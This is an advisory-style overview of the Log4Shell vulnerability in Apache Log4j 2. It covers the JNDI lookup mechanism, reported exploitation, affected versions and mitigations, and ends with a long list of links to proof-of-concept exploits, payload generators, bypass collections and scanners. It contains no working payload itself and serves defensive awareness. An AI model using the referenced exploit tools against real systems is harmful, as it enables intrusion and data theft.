Executive Summary
CVE-2021-44228, commonly referred to as Log4Shell, is a critical remote code execution (RCE) vulnerability in the widely-used Apache Log4j 2 library. This vulnerability, which has a CVSS score of 10.0, allows attackers to execute arbitrary code on a server by manipulating log messages or log message parameters. The vulnerability has been actively exploited in the wild, affecting numerous sectors globally, including technology, finance, healthcare, and government. The impact of this vulnerability is far-reaching, with potential consequences including data breaches, ransomware attacks, and unauthorized access to sensitive information.
Technical Information
CVE-2021-44228 affects Apache Log4j2 versions 2.0-beta9 through 2.15.0, excluding security releases 2.12.2, 2.12.3, and 2.3.1. The vulnerability arises from the JNDI features used in configuration, log messages, and parameters, which do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
The vulnerability is particularly dangerous because it requires minimal effort to exploit. An attacker can simply send a specially crafted string to a vulnerable application, which then logs the string using Log4j. The string triggers a lookup to an attacker-controlled server, which responds with malicious code that is executed by the vulnerable application. This can lead to complete system compromise, data exfiltration, and further lateral movement within the network.
The severity of this vulnerability is underscored by its CVSS score of 10.0, indicating the highest level of criticality. The attack vector is network-based, with low attack complexity, no privileges required, and no user interaction needed. The scope of the impact is extensive, affecting confidentiality, integrity, and availability.
Exploitation in the Wild
Since its disclosure, the Log4Shell vulnerability has been actively exploited by threat actors. Attackers have leveraged this vulnerability to deploy various types of malware, including ransomware, cryptominers, and botnets. Notable incidents include the exploitation of VMware vCenter Server, UniFi Network Application, and AD Manager Plus for unauthenticated remote code execution.
In one instance, attackers used the vulnerability to deploy the Conti ransomware, leading to significant disruptions in affected organizations. In another case, the Kinsing malware was deployed to mine cryptocurrency on compromised servers. Additionally, the Mirai botnet was observed exploiting the vulnerability to recruit new devices into its network.
Indicators of Compromise (IOCs) associated with these attacks include unusual outbound network traffic to unfamiliar domains, the presence of unexpected processes or services, and the detection of known malware signatures. Organizations are advised to monitor their networks for these IOCs and take immediate action if any are detected.
APT Groups using this vulnerability
Several Advanced Persistent Threat (APT) groups have been observed exploiting the Log4Shell vulnerability. These groups target a wide range of sectors, including technology, finance, healthcare, and government, across various countries. Notable APT groups include:
APT41: Known for its sophisticated cyber espionage campaigns, APT41 has been observed exploiting Log4Shell to gain unauthorized access to sensitive information and deploy malware.
FIN12: This financially motivated group has leveraged the vulnerability to deploy ransomware and extort affected organizations.
Lazarus Group: Associated with North Korea, the Lazarus Group has used Log4Shell to conduct cyber espionage and financial theft.
Cobalt Strike: While not an APT group, the Cobalt Strike tool has been widely used by various threat actors to exploit Log4Shell and conduct post-exploitation activities.
Affected Product Versions
The following product versions are affected by CVE-2021-44228:
Apache Log4j2: Versions 2.0-beta9 to 2.15.0 (excluding 2.12.2, 2.12.3, and 2.3.1)
VMware vCenter Server: Versions prior to the patched release
UniFi Network Application: Versions prior to the patched release
AD Manager Plus: Versions prior to the patched release
Organizations using these products are strongly advised to update to the latest versions to mitigate the risk of exploitation.
Workaround and Mitigation
To mitigate the risk posed by CVE-2021-44228, organizations should take the following steps:
Update to the latest version of Apache Log4j2. Versions 2.16.0 and later have addressed the vulnerability by disabling JNDI lookups by default.
Apply patches provided by vendors for affected products, such as VMware vCenter Server, UniFi Network Application, and AD Manager Plus.
Implement network segmentation to limit the exposure of vulnerable systems to the internet and restrict outbound network traffic to known, trusted domains.
Monitor network traffic for indicators of compromise (IOCs) associated with Log4Shell exploitation, such as unusual outbound connections and the presence of known malware signatures.
Consider using web application firewalls (WAFs) to block malicious payloads targeting the Log4Shell vulnerability.
References
For further information on CVE-2021-44228 and related exploits, please refer to the following resources:
Apache Log4j2 2.14.1 Remote Code Execution: http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html
Log4j2-Log4Shell-Regexes: http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html
Log4j-Payload-Generator: http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html
L4sh-Log4j-Remote-Code-Execution: http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html
Log4j-Remote-Code-Execution-Word-Bypassing: http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html
Log4j-scan-Extensive-Scanner: http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html
VMware Security Advisory: http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html
Log4Shell HTTP Header Injection: http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html
VMware vCenter Server Unauthenticated Log4Shell JNDI Injection Remote Code Execution: http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html
UniFi Network Application Unauthenticated Log4Shell Remote Code Execution: http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html
Mobile Iron Log4Shell Remote Command Execution: http://packetstormsecurity.com/files/167917/Mobile-Iron-Log4Shell-Remote-Command-Execution.html
Full Disclosure: http://seclists.org/fulldisclosure/2022/Dec/2
GitHub - 0-x-2-2/CVE-2021-44228: https://github.com/0-x-2-2/CVE-2021-44228
GitHub - 0x3SC4L4T3/Apache-Log4j-POC: https://github.com/0x3SC4L4T3/Apache-Log4j-POC
GitHub - 0xDexter0us/Log4J-Scanner: https://github.com/0xDexter0us/Log4J-Scanner
GitHub - 0xInfection/LogMePwn: https://github.com/0xInfection/LogMePwn
GitHub - 0xRyan/log4j-nullroute: https://github.com/0xRyan/log4j-nullroute
GitHub - 0xst4n/CVE-2021-44228-poc: https://github.com/0xst4n/CVE-2021-44228-poc
GitHub - 0xsyr0/CVE-2021-44228-log4j-log4shell-Security-Research-Summary: https://github.com/0xsyr0/CVE-2021-44228-log4j-log4shell-Security-Research-Summary
GitHub - 0xsyr0/Log4Shell: https://github.com/0xsyr0/Log4Shell
GitHub - 1lann/log4shelldetect: https://github.com/1lann/log4shelldetect
GitHub - 4jfinder/4jfinder.github.io: https://github.com/4jfinder/4jfinder.github.io
GitHub - Ananya-0306/Log-4j-scanner: https://github.com/Ananya-0306/Log-4j-scanner
GitHub - Azeemering/CVE-2021-44228-DFIR-Notes: https://github.com/Azeemering/CVE-2021-44228-DFIR-Notes
GitHub - BinaryDefense/log4j-honeypot-flask: https://github.com/BinaryDefense/log4j-honeypot-flask
GitHub - CERTCC/CVE-2021-44228_scanner: https://github.com/CERTCC/CVE-2021-44228_scanner
GitHub - CodeShield-Security/Log4JShell-Bytecode-Detector: https://github.com/CodeShield-Security/Log4JShell-Bytecode-Detector
GitHub - ColdFusionX/CVE-2021-44228-Log4Shell-POC: https://github.com/ColdFusionX/CVE-2021-44228-Log4Shell-POC
GitHub - CrackerCat/CVE-2021-44228-Log4j-Payloads: https://github.com/CrackerCat/CVE-2021-44228-Log4j-Payloads
GitHub - CreeperHost/Log4jPatcher: https://github.com/CreeperHost/Log4jPatcher
GitHub - DXC-StrikeForce/Burp-Log4j-HammerTime: https://github.com/DXC-StrikeForce/Burp-Log4j-HammerTime
GitHub - Diverto/nse-log4shell: https://github.com/Diverto/nse-log4shell
GitHub - DragonSurvivalEU/RCE: https://github.com/DragonSurvivalEU/RCE
GitHub - ExploitPwner/CVE-2021-44228-Mass-RCE-Log4j: https://github.com/ExploitPwner/CVE-2021-44228-Mass-RCE-Log4j
GitHub - Glease/Healer: https://github.com/Glease/Healer
GitHub - HyCraftHD/Log4J-RCE-Proof-Of-Concept: https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept
GitHub - Hydragyrum/evil-rmi-server: https://github.com/Hydragyrum/evil-rmi-server
GitHub - HynekPetrak/log4shell-finder: https://github.com/HynekPetrak/log4shell-finder
GitHub - HynekPetrak/log4shell_finder: https://github.com/HynekPetrak/log4shell_finder
GitHub - JagarYousef/log4j-dork-scanner: https://github.com/JagarYousef/log4j-dork-scanner
GitHub - Jeromeyoung/log4j2burpscanner: https://github.com/Jeromeyoung/log4j2burpscanner
GitHub - Joefreedy/Log4j-Windows-Scanner: https://github.com/Joefreedy/Log4j-Windows-Scanner
GitHub - KeysAU/Get-log4j-Windows-local: https://github.com/KeysAU/Get-log4j-Windows-local
GitHub - KeysAU/Get-log4j-Windows.ps1: https://github.com/KeysAU/Get-log4j-Windows.ps1
GitHub - KosmX/CVE-2021-44228-example: https://github.com/KosmX/CVE-2021-44228-example
GitHub - Koupah/MC-Log4j-Patcher: https://github.com/Koupah/MC-Log4j-Patcher
GitHub - Kr0ff/CVE-2021-44228: https://github.com/Kr0ff/CVE-2021-44228
GitHub - Labout/log4shell-rmi-poc: https://github.com/Labout/log4shell-rmi-poc
GitHub - LiveOverflow/log4shell: https://github.com/LiveOverflow/log4shell
GitHub - M1ngGod/CVE-2021-44228-Log4j-lookup-Rce: https://github.com/M1ngGod/CVE-2021-44228-Log4j-lookup-Rce
GitHub - Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228: https://github.com/Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228
GitHub - MalwareTech/Log4jTools: https://github.com/MalwareTech/Log4jTools
GitHub - Mormoroth/log4j-vulnerable-app-cve-2021-44228-terraform: https://github.com/Mormoroth/log4j-vulnerable-app-cve-2021-44228-terraform
GitHub - MrHarshvardhan/PY-Log4j-RCE-Scanner: https://github.com/MrHarshvardhan/PY-Log4j-RCE-Scanner
GitHub - NS-Sp4ce/Vm4J: https://github.com/NS-Sp4ce/Vm4J
GitHub - Nanitor/log4fix: https://github.com/Nanitor/log4fix
GitHub - NorthwaveSecurity/log4jcheck: https://github.com/NorthwaveSecurity/log4jcheck
GitHub - Occamsec/log4j-checker: https://github.com/Occamsec/log4j-checker
GitHub - OlafHaalstra/log4jcheck: https://github.com/OlafHaalstra/log4jcheck
GitHub - OopsieWoopsie/mc-log4j-patcher: https://github.com/OopsieWoopsie/mc-log4j-patcher
GitHub - Puliczek/CVE-2021-44228-PoC-log4j-bypass-words: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
GitHub - PwnC00re/Log4J_0day_RCE: https://github.com/PwnC00re/Log4J_0day_RCE
GitHub - RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs: https://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs
GitHub - Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs: https://github.com/Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs
GitHub - StandB/CVE-2021-44228-poc: https://github.com/StandB/CVE-2021-44228-poc
GitHub - Tai-e/CVE-2021-44228: https://github.com/Tai-e/CVE-2021-44228
GitHub - TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit: https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit
GitHub - TheInterception/Log4J-Simulation-Tool: https://github.com/TheInterception/Log4J-Simulation-Tool
GitHub - Y0-kan/Log4jShell-Scan: https://github.com/Y0-kan/Log4jShell-Scan
GitHub - ab0x90/CVE-2021-44228_PoC: https://github.com/ab0x90/CVE-2021-44228_PoC
GitHub - ahmad4fifz/CVE-2021-44228: https://github.com/ahmad4fifz/CVE-2021-44228
GitHub - ainrm/log4j-scan: https://github.com/ainrm/log4j-scan
GitHub - alexandre-lavoie/python-log4rce: https://github.com/alexandre-lavoie/python-log4rce
GitHub - alexandreroman/cve-2021-44228-workaround-buildpack: https://github.com/alexandreroman/cve-2021-44228-workaround-buildpack
GitHub - alexbakker/log4shell-tools: https://github.com/alexbakker/log4shell-tools
GitHub - ankur-katiyar/log4j-docker: https://github.com/ankur-katiyar/log4j-docker
GitHub - atnetws/fail2ban-log4j: https://github.com/atnetws/fail2ban-log4j
GitHub - authomize/log4j-log4shell-affected: https://github.com/authomize/log4j-log4shell-affected
GitHub - aws-samples/kubernetes-log4j-cve-2021-44228-node-agent: https://github.com/aws-samples/kubernetes-log4j-cve-2021-44228-node-agent
Comments